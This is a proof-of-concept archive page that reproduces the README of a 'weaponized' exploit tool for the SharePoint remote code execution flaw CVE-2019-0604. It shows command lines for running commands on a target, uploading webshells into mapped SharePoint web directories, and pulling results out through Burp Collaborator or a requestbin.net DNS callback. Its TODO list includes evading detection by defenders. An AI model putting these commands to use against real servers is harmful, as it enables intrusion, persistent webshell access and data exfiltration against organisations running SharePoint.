Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-0604 PoC — Microsoft SharePoint 输入验证错误漏洞

Source
https://github.com/Gh0st0ne/weaponized-0604
Associated Vulnerability
Title:Microsoft SharePoint 输入验证错误漏洞 (CVE-2019-0604)
Description:A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.
Description
Automated tool to exploit sharepoint CVE-2019-0604
Readme
# Weaponized CVE-2019-0604

Automated Exploit Tool to Maximize CVE-2019-0604. 

## Requirement

The `requirements.txt` file should list all Python libraries this tool used, and they'll be installed using

```
$ pip install -r requirements.txt
```

## Manual blind exploit (with(out) credential)

```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>
```

## Upload function

upload anything cool (webshell, recon tool ...)

```
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx
```

### Directory Mapping

```
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/
```

## Use OOB to get command result

### With [collaborator\_http\_api](https://github.com/tree-chtsec/burp-python-plugins) Burp Extension

1. Install `collaborator_http_api.py` into BurpSuite (Pro)?

2. Make sure BurpSuite running on the same machine with this exploit.

3. Fire, enjoy the retrieved output :)

```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>
```

![sharepoint-rce-oob-demo](SHAREPOINT_RCE_OOB.png)

### With DNSLog s.t. requestbin.net
```sh
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"
```

Get Data From dns
```
2050524956494c4547455320494e464f524d4154494f4e
...
```

Decoded by yourself :)
```
 PRIVILEGES INFORMATION
...
```

## TODO
- [x] Argument Parser
- [x] SharePoint, CVE-2019-0604
- [ ] split cmd into multiple parts (in args.cmds)
- [x] specify binary on demand, avoiding detection by blue team. (hardcode cmd.exe currently)

## Author
* Tree
File Snapshot

 [4.0K]  /data/pocs/e7b277cd6b4283bbb7bd930f0f9be00a8fd8dcac
├── [3.0K]  burpReq.py
├── [9.5K]  exploit.py
├── [1.0K]  LICENSE
├── [4.0K]  oob
│   ├── [1.3K]  collab_handler.py
│   ├── [2.1K]  decoder.py
│   ├── [   0]  __init__.py
│   ├── [1.0K]  payload.ps1
│   └── [ 944]  sample.json
├── [2.4K]  README.md
├── [  34]  requirements.txt
├── [3.4K]  sharepointkit.py
└── [577K]  SHAREPOINT_RCE_OOB.png

1 directory, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →